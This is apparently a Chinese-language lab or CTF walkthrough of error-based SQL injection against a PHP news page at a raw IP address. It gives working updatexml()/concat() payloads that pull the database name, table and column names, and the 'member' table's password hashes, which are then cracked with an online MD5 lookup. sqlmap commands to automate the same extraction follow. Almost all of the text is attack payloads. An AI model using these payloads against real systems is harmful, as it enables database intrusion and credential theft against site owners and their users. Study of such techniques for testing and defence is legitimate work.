1.寻找注入点
当我们闭合了第一个参数后有明显的报错信息,我们就可以考虑基于报错的注入了
http://219.153.49.228:41801/new_list.php?id=1’
2.报错注入-报错回显
参考:https://www.jianshu.com/p/bc35f8dd4f7c ; https://blog.csdn.net/Kevinhanser/article/details/81592866
1.爆破数据库
查看数据库名字,本来想用union查询,但是当前网站过滤掉了union,这里用到了updatexml()函数的报错回显功能,会把信息显示在页面中。然后也用到了concat()函数,是连接两个字符串的。
?id=1‘ and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1) --+
?id=1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
2. 有了数据库名字就可以开始爆表了(通过information_schema数据库)
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='stormgroup'),0x7e),1) --+
3.爆破字段
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='member'),0x7e),1) --+
4。爆破密码,用户
and updatexml(1,concat(0x7e,(select password from member limit 0,1),0x7e),1) --+
and updatexml(1,concat(0x7e,(select password from member limit 1,1),0x7e),1) --+
注意:这里只获得了31位密码,其实password字段里面的数据是有32位的,只是没显示那么多,所以下面要用substr()去单独获取password字段的最后一位数
and updatexml(1,concat(0x7e,(select substr(password,32,1) from member limit 0,1),0x7e),1) --+
and updatexml(1,concat(0x7e,(select substr(password,32,1) from member limit 1,1),0x7e),1) --+
然后密码拿去MD5网站解码(https://www.cmd5.com/)
清理sqlmap缓存:python sqlmap.py --purge
可以直接用sqlmap扫
1.爆数据库 sqlmap -u url --dbs
2.爆表 sqlmap.py -u url -D 数据库 -tables
3.爆字段名 sqlmap.py -u url -D 数据库 -T 表 columns
4.爆字段值 sqlmap.py -u url -D 数据库 -T 表 -C name,password,status
5.之后使用md5解密即可